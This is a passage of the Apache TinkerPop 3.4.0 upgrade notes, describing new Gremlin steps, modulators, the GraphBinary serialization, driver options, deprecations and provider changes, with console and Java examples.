If this limit is reached for all connections, then a\n`NoConnectionAvailableException` is thrown which makes this a breaking change.\n\nThese settings can be set as properties on the `ConnectionPoolSettings` instance that can be passed to the `GremlinClient`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1774[TINKERPOP-1774],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1775[TINKERPOP-1775],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#_connection_pool[Reference Documentation]\n\n==== Indexing of Collections\n\nTinkerPop 3.4.0 adds a new `index()`-step, which allows users to transform simple collections into index collections or maps.\n\n```\ngremlin> g.V().hasLabel(\"software\").values(\"name\").fold().\n......1> order(local).\n......2> index().unfold()\n==>[lop,0]\n==>[ripple,1]\ngremlin> g.V().hasLabel(\"person\").values(\"name\").fold().\n......1> order(local).by(decr).\n......2> index().\n......3> with(WithOptions.indexer, WithOptions.map)\n==>[0:vadas,1:peter,2:marko,3:josh]\n```\n\n==== Modulation of valueMap()\n\nThe `valueMap()` step now supports `by` and `with` modulation, which also led to the deprecation of `valueMap(true)` overloads.\n\n===== by() Modulation\n\nWith the help of the `by()` modulator `valueMap()` result values can now be adjusted, which is particularly useful to turn multi-\/list-values into single values.\n\n```\ngremlin> g.V().hasLabel(\"person\").valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[vadas],age:[27]]\n==>[name:[josh],age:[32]]\n==>[name:[peter],age:[35]]\ngremlin> g.V().hasLabel(\"person\").valueMap().by(unfold())\n==>[name:marko,age:29]\n==>[name:vadas,age:27]\n==>[name:josh,age:32]\n==>[name:peter,age:35]\n```\n===== with() Modulation\n\nThe `with()` modulator can be used to include certain tokens (`id`, `label`, `key` and\/or `value`).\n\nThe old way (still valid, but deprecated):\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap(true)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap(true)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nThe new way:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens)\n==>[id:10,label:software,name:[gremlin]]\n==>[id:11,label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens)\n==>[id:6,key:location,value:san diego,startTime:1997,endTime:2001]\n==>[id:7,key:location,value:santa cruz,startTime:2001,endTime:2004]\n==>[id:8,key:location,value:brussels,startTime:2004,endTime:2005]\n==>[id:9,key:location,value:santa fe,startTime:2005]\n```\n\nFurthermore, now there's a finer control over which of the tokens should be included:\n\n```\ngremlin> g.V().hasLabel(\"software\").valueMap().with(WithOptions.tokens, WithOptions.labels)\n==>[label:software,name:[gremlin]]\n==>[label:software,name:[tinkergraph]]\ngremlin> g.V().has(\"person\",\"name\",\"marko\").properties(\"location\").valueMap().with(WithOptions.tokens, WithOptions.values)\n==>[value:san diego,startTime:1997,endTime:2001]\n==>[value:santa cruz,startTime:2001,endTime:2004]\n==>[value:brussels,startTime:2004,endTime:2005]\n==>[value:santa 
fe,startTime:2005]\n```\n\nAs shown above, the support of the `with()` modulator for `valueMap()` makes the `valueMap(boolean)` overload\nsuperfluous, hence this overload is now deprecated. This is a breaking API change, since `valueMap()` will now always\nyield instances of type `Map<Object, Object>`. Prior to this change only the `valueMap(boolean)` overload yielded\n`Map<Object, Object>` objects; `valueMap()` without the boolean parameter used to yield instances of type\n`Map<String, Object>`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2059[TINKERPOP-2059]\n\n==== Predicate Number Comparison\n\nIn previous versions `within()` and `without()` performed strict number comparisons; that means these predicates did\nnot only compare number values, but also the type. This was inconsistent with how other predicates (like `eq`, `gt`,\netc.) work. All predicates will now ignore the number type and instead compare numbers only based on their value.\n\nOld behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\ngremlin>\n```\n\nNew behavior:\n\n```\ngremlin> g.V().has(\"age\", eq(32L))\n==>v[4]\ngremlin> g.V().has(\"age\", within(32L, 35L))\n==>v[4]\n==>v[6]\n```\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2058[TINKERPOP-2058]\n\n==== ReferenceElementStrategy\n\nGremlin Server has had some inconsistent behavior in the serialization of the results it returns. Remote traversals\nbased on Gremlin bytecode always detach returned graph elements to \"reference\" (i.e. removing properties and including only\nthe `id` and `label`), but scripts would detach graph elements and include the properties. For 3.4.0,\nTinkerPop introduces the `ReferenceElementStrategy` which can be configured on a `GraphTraversalSource` to always\ndetach to \"reference\".\n\n[source,text]\n----\ngremlin> graph = TinkerFactory.createModern()\n==>tinkergraph[vertices:6 edges:6]\ngremlin> g = graph.traversal().withStrategies(ReferenceElementStrategy.instance())\n==>graphtraversalsource[tinkergraph[vertices:6 edges:6], standard]\ngremlin> v = g.V().has('person','name','marko').next()\n==>v[1]\ngremlin> v.class\n==>class org.apache.tinkerpop.gremlin.structure.util.reference.ReferenceVertex\ngremlin> v.properties()\ngremlin>\n----\n\nThe packaged initialization scripts that come with Gremlin Server now pre-configure the sample graphs with this\nstrategy to ensure that both scripts and bytecode based requests over any protocol (HTTP, websocket, etc) and\nserialization format all return a \"reference\". To revert to the old form, simply remove the strategy in the\ninitialization script.\n\nIt is recommended that users choose to configure their `GraphTraversalSource` instances with `ReferenceElementStrategy`\nas working with \"references\" only is the recommended method for developing applications with TinkerPop. In the future,\nit is possible that `ReferenceElementStrategy` will be configured by default for all graphs on or off Gremlin Server,\nso it would be best to start utilizing it now and grooming existing Gremlin and related application code to account\nfor it.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2075[TINKERPOP-2075]\n\n==== Text Predicates\n\nGremlin now supports simple text predicates on top of the existing `P` predicates. 
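For example, a hedged Gremlin-Java sketch over the \"modern\" toy graph using the `startingWith` predicate (the class and setup are illustrative; only `TextP` and its factory methods come from TinkerPop itself):\n\n[source,java]\n----\nimport static org.apache.tinkerpop.gremlin.process.traversal.TextP.startingWith;\n\nimport org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource;\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.TinkerFactory;\n\npublic class TextPredicateSketch {\n public static void main(String[] args) {\n GraphTraversalSource g = TinkerFactory.createModern().traversal();\n \/\/ matches names that start with \"ma\" (\"marko\" in the toy graph)\n g.V().has(\"person\", \"name\", startingWith(\"ma\")).\n values(\"name\").forEachRemaining(System.out::println);\n }\n}\n----\n\n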
Both the new `TextP` text predicates and the old `P` predicates can be chained using `and()` and `or()`.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\")).valueMap()\n==>[name:[marko],age:[29]]\n==>[name:[josh],age:[32]]\ngremlin> g.V().has(\"person\",\"name\", containing(\"o\").and(gte(\"j\").and(endingWith(\"ko\")))).valueMap()\n==>[name:[marko],age:[29]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2041[TINKERPOP-2041]\n\n==== Changed Infix Behavior\n\nThe infix notation of `and()` and `or()` now supports an arbitrary number of traversals and `ConnectiveStrategy`\nproduces a traversal with proper AND and OR semantics.\n\n```\nInput: a.or.b.and.c.or.d.and.e.or.f.and.g.and.h.or.i\n\n*BEFORE*\nOutput: or(a, or(and(b, c), or(and(d, e), or(and(and(f, g), h), i))))\n\n*NOW*\nOutput: or(a, and(b, c), and(d, e), and(f, g, h), i)\n```\n\nFurthermore, previous versions failed to apply 3 or more `and()` steps using the infix notation; this is now fixed.\n\n[source,groovy]\n----\ngremlin> g.V().has(\"name\",\"marko\").and().has(\"age\", lt(30)).or().has(\"name\",\"josh\").and().has(\"age\", gt(30)).and().out(\"created\")\n==>v[1]\n==>v[4]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2029[TINKERPOP-2029]\n\n==== GraphBinary\n\nGraphBinary is a new language-agnostic network serialization format designed to replace Gryo and GraphSON. At this\ntime it is only available on the JVM, but support will be added for other languages in upcoming releases. The\nserializer has been configured in Gremlin Server's packaged configuration files. The serializer can be configured\nusing the Java driver as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.build(\"localhost\").port(8182).\n serializer(Serializers.GRAPHBINARY_V1D0).create();\nClient client = cluster.connect();\nList<Result> r = client.submit(\"g.V().has('person','name','marko')\").all().join();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1942[TINKERPOP-1942],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/dev\/io\/#graphbinary[IO Documentation]\n\n==== Status Attributes\n\nThe Gremlin Server protocol allows for status attributes to be returned in responses. These attributes were typically\nfor internal use, but were designed with extensibility in mind so that providers could return their own\nattributes to calling clients. Unfortunately, unless the client was being used with protocol level requests (which\nwasn't convenient) those attributes were essentially hidden from view. As of this version, however, status attributes\nare fully retrievable for both successful requests and exceptions.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1913[TINKERPOP-1913]\n\n==== with() Step\n\nThis version of TinkerPop introduces the `with()`-step to Gremlin. It isn't really a step but is instead a step\nmodulator. This modulator allows the step it is modifying to accept configurations that can be used to alter the\nbehavior of the step itself. 
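As a quick illustration of the pattern, the earlier `index()` example can be written with the same modulator in Gremlin-Java (a sketch; the `WithOptions` import path is assumed from `gremlin-core` 3.4.0):\n\n[source,java]\n----\nimport org.apache.tinkerpop.gremlin.process.traversal.Scope;\nimport org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource;\nimport org.apache.tinkerpop.gremlin.process.traversal.step.util.WithOptions;\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.TinkerFactory;\n\npublic class WithModulatorSketch {\n public static void main(String[] args) {\n GraphTraversalSource g = TinkerFactory.createModern().traversal();\n \/\/ with() hands the indexer option to the index()-step it modulates\n Object indexed = g.V().hasLabel(\"person\").values(\"name\").fold().\n order(Scope.local).\n index().\n with(WithOptions.indexer, WithOptions.map).\n next();\n System.out.println(indexed); \/\/ e.g. {0=josh, 1=marko, 2=peter, 3=vadas}\n }\n}\n----\n\n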
A good example of its usage is shown with the revised syntax of the `pageRank()`-step\nwhich now uses `with()` to replace the old `by()` options:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n pageRank().\n with(PageRank.edges, __.outE('knows')).\n with(PageRank.propertyName, 'friendRank').\n order().\n by('friendRank',desc).\n valueMap('name','friendRank')\n----\n\nA similar change was made for `peerPressure()`-step:\n\n[source,groovy]\n----\ng.V().hasLabel('person').\n peerPressure().\n with(PeerPressure.propertyName, 'cluster').\n group().\n by('cluster').\n by('name')\n----\n\nNote that the `by()` modulators still work, but should be considered deprecated and open for removal in a future\nrelease where breaking changes are allowed.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1975[TINKERPOP-1975],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#with-step[Reference Documentation]\n\n==== shortestPath() Step\n\nCalculating the link:https:\/\/en.wikipedia.org\/wiki\/Shortest_path_problem[shortest path] between vertices is a common\ngraph use case. While the traversal to determine a shortest path can be expressed in Gremlin, this particular problem\nis common enough that the feature has been encapsulated into its own step, demonstrated as follows:\n\n[source,text]\n----\ngremlin> g.withComputer().V().has('name','marko').\n......1> shortestPath().with(ShortestPath.target, has('name','peter'))\n==>[v[1],v[3],v[6]]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1990[TINKERPOP-1990],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#shortestpath-step[Reference Documentation]\n\n==== connectedComponent() Step\n\nIn prior versions of TinkerPop, it was recommended that the identification of\nlink:https:\/\/en.wikipedia.org\/wiki\/Connected_component_(graph_theory)[Connected Component] instances in a graph be\ncomputed by way of a reasonably complex bit of Gremlin that looked something like this:\n\n[source,groovy]\n----\ng.V().emit(cyclicPath().or().not(both())).repeat(both()).until(cyclicPath()).\n path().aggregate(\"p\").\n unfold().dedup().\n map(__.as(\"v\").select(\"p\").unfold().\n filter(unfold().where(eq(\"v\"))).\n unfold().dedup().order().by(id).fold()).\n dedup()\n----\n\nThe above approach had a number of drawbacks that included a large execution cost as well as incompatibilities in OLAP.\nTo simplify usage of this commonly used graph algorithm, TinkerPop 3.4.0 introduces the `connectedComponent()` step\nwhich reduces the above operation to:\n\n[source,groovy]\n----\ng.withComputer().V().connectedComponent()\n----\n\nIt is important to note that this step does require the use of a `GraphComputer` to work, as it utilizes a\n`VertexProgram` behind the scenes.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1967[TINKERPOP-1967],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#connectedcomponent-step[Reference Documentation]\n\n==== io() Step\n\nThere have been some important changes to IO operations for reading and writing graph data. 
The use of `Graph.io()`\nhas been deprecated to further remove dependence on the Graph (Structure) API for users and to extend these basic\noperations to GLV users by making these features available as part of the Gremlin language.\n\nIt is now possible to simply use Gremlin:\n\n[source,groovy]\n----\ngraph = ...\ng = graph.traversal()\ng.io(someInputFile).read().iterate()\ng.io(someOutputFile).write().iterate()\n----\n\nWhile `io()`-step is still single-threaded for OLTP style loading, it can be utilized in conjunction with OLAP which\ninternally uses `CloneVertexProgram` and therefore any graph `InputFormat` or `OutputFormat` can be configured in\nconjunction with this step for parallel loads of large datasets.\n\nIt is also worth noting that the `io()`-step may be overridden by graph providers to utilize their native bulk-loading\nfeatures, so consult the documentation of the implementation being used to determine if there are any improved\nefficiencies there.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996],\nlink:http:\/\/tinkerpop.apache.org\/docs\/3.4.0\/reference\/#io-step[Reference Documentation]\n\n==== Per Request Options\n\nThe Java driver now allows for various options to be set on a per-request basis via new overloads to `submit()` that\naccept `RequestOption` instances. A good use-case for this feature is to set a per-request override to the\n`scriptEvaluationTimeout` so that it only applies to the current request.\n\n[source,java]\n----\nCluster cluster = Cluster.open();\nClient client = cluster.connect();\nRequestOptions options = RequestOptions.build().timeout(500).create();\nList<Result> result = client.submit(\"g.V()\", options).all().get();\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1342[TINKERPOP-1342]\n\n==== `min()` `max()` and Comparable\n\nPreviously `min()` and `max()` were only working for numeric values. This has been changed and these steps can now\noperate over any `Comparable` value. The common workaround was the combination of `order().by()` and `limit()` as\nshown here:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').order().by().limit(1) \/\/ workaround for min()\n==>josh\ngremlin> g.V().values('name').order().by(decr).limit(1) \/\/ workaround for max()\n==>vadas\n----\n\nAny attempt to use `min()` or `max()` on non-numeric values lead to an exception:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\njava.lang.String cannot be cast to java.lang.Number\nType ':help' or ':h' for help.\nDisplay stack trace? 
[yN]\n----\n\nWith the changes in this release these kind of queries became a lot easier:\n\n[source,groovy]\n----\ngremlin> g.V().values('name').min()\n==>josh\ngremlin> g.V().values('name').max()\n==>vadas\n----\n\n==== Nested Loop Support\n\nTraversals now support nesting of `repeat()` loops.\n\nThese can now be used to repeat another traversal while in a looped context, either inside the body of a `repeat()` or\nin its step modifiers (`until()` or `emit()`).\n\n[source,groovy]\n----\ngremlin> g.V().repeat(__.in('traverses').repeat(__.in('develops')).emit()).emit().values('name')\n==>stephen\n==>matthias\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-967[TINKERPOP-967]\n\n==== EventStrategy API\n\nThere were some minor modifications to how `EventStrategy` is constructed and what can be expected from events raised\nfrom the addition of new properties.\n\nWith respect to the change in terms of `EventStrategy` construction, the `detach()` builder method formerly took a\n`Class` as an argument and that `Class` was meant to be one of the various \"detachment factories\" or `null`. That\napproach was a bit confusing, so that signature has changed to `detach(EventStrategy.Detachment)` where the argument\nis a more handy enum of detachment options.\n\nAs for the changes related to events themselves, it is first worth noting that the previously deprecated\n`vertexPropertyChanged(Vertex, Property, Object, Object...)` on `MutationListener` has been removed for what should\nhave originally been the correct signature of `vertexPropertyChanged(Vertex, VertexProperty, Object, Object...)`. In\nprior versions when this method and its related `edgePropertyChanged()` and `vertexPropertyPropertyChanged()` were\ntriggered by way of the addition of a new property a \"fake\" property was included with a `null` value for the\n\"oldValue\" argument to these methods (as it did not exist prior to this event). That was a bit awkward to reason about\nwhen dealing with that event. To make this easier, the event now raises with a `KeyedVertexProperty` or\n`KeyedProperty` instance, which only contains a property key and no value in them.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1831[TINKERPOP-1831]\n\n==== Reducing Barrier Steps\n\nThe behavior of `min()`, `max()`, `mean()` and `sum()` has been modified to return no result if there's no input.\nPreviously these steps yielded the internal seed value:\n\n[source,groovy]\n----\ngremlin> g.V().values('foo').min()\n==>NaN\ngremlin> g.V().values('foo').max()\n==>NaN\ngremlin> g.V().values('foo').mean()\n==>NaN\ngremlin> g.V().values('foo').sum()\n==>0\n----\n\nThese traversals will no longer emit a result. Note, that this also affects more complex scenarios, e.g. if these\nsteps are used in `by()` modulators:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[software:0,person:3.5]\n----\n\nSince software vertices have no outgoing edges and thus no weight values to sum, `software` will no longer show up in\nthe result. 
In order to get the same result as before, one would have to add a `coalesce()`-step:\n\n[source,groovy]\n----\ngremlin> g.V().group().\n......1> by(label).\n......2> by(outE().values(\"weight\").sum())\n==>[person:3.5]\ngremlin> g.V().group().\n......1> by(label).\n......2> by(coalesce(outE().values(\"weight\"), constant(0)).sum())\n==>[software:0,person:3.5]\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1777[TINKERPOP-1777]\n\n==== Order of select() Scopes\n\nThe order of select scopes has been changed to: maps, side-effects, paths. Previously the order was: side-effects,\nmaps, paths - which made it almost impossible to select a specific map entry if a side-effect with the same name\nexisted.\n\nThe following snippets illustrate the changed behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>[a:marko]\n----\n\nAbove is the old behavior; the second `select(\"a\")` has no effect, it selects the side-effect `a` again, although one\nwould expect to get the map entry `a`. What follows is the new behavior:\n\n[source,groovy]\n----\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\")\n==>[a:marko]\ngremlin> g.V(1).\n......1> group(\"a\").\n......2> by(__.constant(\"a\")).\n......3> by(__.values(\"name\")).\n......4> select(\"a\").select(\"a\")\n==>marko\n----\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1522[TINKERPOP-1522]\n\n==== GraphSON BulkSet\n\nIn earlier versions of TinkerPop, `BulkSet` was coerced to a `List` for GraphSON which was convenient in that it\ndidn't add a new data type to support, but inconvenient in that it meant that certain process tests were not consistent\nin terms of how they ran and the benefits of the `BulkSet` were \"lost\" in that the \"bulk\" was being resolved server\nside. With the addition of `BulkSet` as a GraphSON type the \"bulk\" is now resolved on the client side by the language\nvariant. How that resolution occurs depends upon the language variant. For Java, there is a `BulkSet` object which\nmaintains that structure sent from the server. For the other variants, the `BulkSet` is deserialized to a `List` form\nwhich results in a much larger memory footprint than what is contained the `BulkSet`.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2111[TINKERPOP-2111]\n\n==== Deprecation and Removal\n\nThis section describes newly deprecated classes, methods, components and patterns of usage as well as which previously\ndeprecated features have been officially removed or repurposed.\n\n===== Moving of RemoteGraph\n\n`RemoteGraph` was long ago deprecated in favor of `withRemote()`. It became even less useful with the introduction of\nthe `AnonymousTraversalSource` concept in 3.3.5. It's only real use was for testing remote bytecode based traversals\nin the test suite as the test suite requires an actual `Graph` object to function properly. As such, `RemoteGraph` has\nbeen moved to `gremlin-test`. It should no longer be used in any capacity besides that.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079]\n\n===== Removal of Giraph Support\n\nSupport for Giraph has been removed as of this version. 
There were a number of reasons for this decision which were\ndiscussed in the community prior to taking this step. Users should switch to Spark for their OLAP based graph-computing\nneeds.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1930[TINKERPOP-1930]\n\n===== Removal of Rebindings Options\n\nThe \"rebindings\" option is no longer supported for clients. It was deprecated long ago at 3.1.0. The server will not\nrespond to them on any channel - websockets, nio or HTTP. Use the \"aliases\" option instead.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705]\n\n===== gremlin-server.sh -i Removal\n\nThe `-i` option for installing dependencies in Gremlin Server was long ago deprecated and has now been removed. Please\nuse `install` as its replacement going forward.\n\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2031[TINKERPOP-2031]\n\n===== Deprecation Removal\n\nThe following deprecated classes, methods or fields have been removed in this version:\n\n* `gremlin-core`\n** `org.apache.tinkerpop.gremlin.jsr223.ImportCustomizer#GREMLIN_CORE`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteGraph` - moved to `gremlin-test`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.remote.RemoteConnection.submit(Bytecode)`\n** `org.apache.tinkerpop.gremlin.process.remote.traversal.strategy.decoration.RemoteStrategy#identity()`\n** `org.apache.tinkerpop.gremlin.process.traversal.TraversalEngine`\n** `org.apache.tinkerpop.gremlin.process.traversal.engine.*`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.PartitionStrategy.Builder#addReadPartition(String)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#edgeCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.strategy.decoration.SubgraphStrategy.Builder#vertexCriterion(Traversal)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.map.LambdaCollectingBarrierStep.Consumers`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.HasContainer#makeHasContainers(String, P)`\n** `org.apache.tinkerpop.gremlin.process.traversal.step.util.event.MutationListener#vertexPropertyChanged(Vertex, Property, Object, Object...)`\n** `org.apache.tinkerpop.gremlin.structure.Element.Exceptions#elementAlreadyRemoved(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object)`\n** `org.apache.tinkerpop.gremlin.structure.Graph.Exceptions#elementNotFound(Class, Object, Exception)`\n* `gremlin-driver`\n** `org.apache.tinkerpop.gremlin.driver.Client#rebind(String)`\n** `org.apache.tinkerpop.gremlin.driver.Client.ReboundClusterdClient`\n** `org.apache.tinkerpop.gremlin.driver.Tokens#ARGS_REBINDINGS`\n* `gremlin-groovy`\n** `org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.close()` - no longer implements `AutoCloseable`\n* `gremlin-server`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getGraphs()`\n** `org.apache.tinkerpop.gremlin.server.GraphManager#getTraversalSources()`\n** `org.apache.tinkerpop.gremlin.server.Settings#serializedResponseTimeout`\n** `org.apache.tinkerpop.gremlin.server.Settings.AuthenticationSettings#className`\n** `org.apache.tinkerpop.gremlin.server.handler.OpSelectorHandler(Settings, GraphManager, GremlinExecutor, ScheduledExecutorService)`\n** `org.apache.tinkerpop.gremlin.server.op.AbstractOpProcessor#makeFrame(ChannelHandlerContext, 
RequestMessage, MessageSerializer serializer, boolean, List, ResponseStatusCode code)`\n* `hadoop-graph`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphInputFormat()`\n** `org.apache.tinkerpop.gremlin.hadoop.structure.HadoopConfiguration#getGraphOutputFormat()`\n\nPlease see the javadoc deprecation notes or upgrade documentation specific to when the deprecation took place to\nunderstand how to resolve this breaking change.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1143[TINKERPOP-1143],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1296[TINKERPOP-1296],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1705[TINKERPOP-1705],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1707[TINKERPOP-1707],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1954[TINKERPOP-1954],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1986[TINKERPOP-1986],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2079[TINKERPOP-2079],\nlink:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2103[TINKERPOP-2103]\n\n===== Deprecated GraphSONMessageSerializerGremlinV2d0\n\nThe `GraphSONMessageSerializerGremlinV2d0` serializer is now analogous to `GraphSONMessageSerializerV2d0` and therefore\nredundant. It has technically always been equivalent in terms of functionality as both serialized to the same format\n(i.e. GraphSON 2.0 with embedded types). It is no longer clear why these two classes were established this way, but\nit does carry the negative effect where multiple serializer versions could not be bound to Gremlin Server's HTTP\nendpoint as the MIME types conflicted on `application\/json`. By simply making both message serializers support\n`application\/json` and `application\/vnd.gremlin-v2.0+json`, it then became possible to overcome that limitation. In\nshort, prefer use of `GraphSONMessageSerializerV2d0` when possible.\n\nNote that this is a breaking change in the sense that `GraphSONMessageSerializerV2d0` will no longer set the header of\nrequests messages to `application\/json`. As a result, older versions of Gremlin Server not configured with\n`GraphSONMessageSerializerGremlinV2d0` will not find a deserializer to match the request.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1984[TINKERPOP-1984]\n\n===== Removed groovy-sql Dependency\n\nGremlin Console and Gremlin Server no longer include groovy-sql. If you depend on groovy-sql,\nyou can install it in Gremlin Console or Gremlin Server using the plugin system.\n\nConsole:\n```\n:install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nServer:\n```\nbin\/gremlin-server.sh install org.codehaus.groovy groovy-sql 2.5.2\n```\n\nIf your project depended on groovy-sql transitively, simply include it in your project's build file (e.g. maven: pom.xml).\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-2037[TINKERPOP-2037]\n\n=== Upgrading for Providers\n\n==== Graph Database Providers\n\n===== io() Step\n\nThe new `io()`-step that was introduced provides some new changes to consider. Note that `Graph.io()` has been\ndeprecated and users are no longer instructed to utilize that method. It is not yet decided when that method will be\nremoved completely, but given the public nature of it and the high chance of common usage, it should be hanging around\nfor some time.\n\nAs with any step in Gremlin, it is possible to replace it with a more provider specific implementation that could be\nmore efficient. 
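A rough, hypothetical sketch of what such a replacement hook can look like follows (`ProviderIoStrategy` is an illustrative name; `ReadWriting` is the interface implemented by the start step that `io()` creates, and the print statement merely stands in for a provider's real substitution logic, e.g. a `TraversalHelper.replaceStep()` call):\n\n[source,java]\n----\nimport org.apache.tinkerpop.gremlin.process.traversal.Traversal;\nimport org.apache.tinkerpop.gremlin.process.traversal.TraversalStrategy;\nimport org.apache.tinkerpop.gremlin.process.traversal.step.ReadWriting;\nimport org.apache.tinkerpop.gremlin.process.traversal.strategy.AbstractTraversalStrategy;\n\npublic final class ProviderIoStrategy\n extends AbstractTraversalStrategy<TraversalStrategy.ProviderOptimizationStrategy>\n implements TraversalStrategy.ProviderOptimizationStrategy {\n\n @Override\n public void apply(final Traversal.Admin<?, ?> traversal) {\n \/\/ io() always sits at the start of the traversal it creates\n if (traversal.getStartStep() instanceof ReadWriting) {\n final ReadWriting io = (ReadWriting) traversal.getStartStep();\n \/\/ a real provider would swap in its native bulk-loading step here\n System.out.println(\"io() bound to \" + io.getFile() + \" in mode \" + io.getMode());\n }\n }\n}\n----\n\n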
Developing a `TraversalStrategy` to do this is encouraged, especially for those graph providers who\nmight have special bulk loaders that could be abstracted by this step. Examples of this are already shown with\n`HadoopGraph` which replaces the simple single-threaded loader with `CloneVertexProgram`. Graph providers are\nencouraged to use the `with()` step to capture any necessary configurations required for their underlying loader to\nwork. Graph providers should not feel restricted to `graphson`, `gryo` and `graphml` formats either. If a graph\nsupports CSV or some custom graph specific format, it shouldn't be difficult to gather the configurations necessary to\nmake that available to users.\n\nSee: link:https:\/\/issues.apache.org\/jira\/browse\/TINKERPOP-1996[TINKERPOP-1996]\n\n===== Caching Graph Features\n\nFor graph implementations that have expensive creation times, it can be time consuming to run the TinkerPop test suite\nas each test run requires a `Graph` instance even if the test is ultimately ignored because it doesn't pass the feature\nchecks. To possibly help alleviate this problem, the `GraphProvider` interface now includes this method:\n\n[source,java]\n----\npublic default Optional<Graph.Features> getStaticFeatures() {\n return Optional.empty();\n}\n----\n\nThis method can be implemented to return a cacheable set of features for a `Graph` generated from that `GraphProvider`.\nAssuming this method is faster than the cost of creating a new `Graph` instance, the test suite should execute\nsignificantly faster depending on how many tests end up being ignored.\n\nSee: 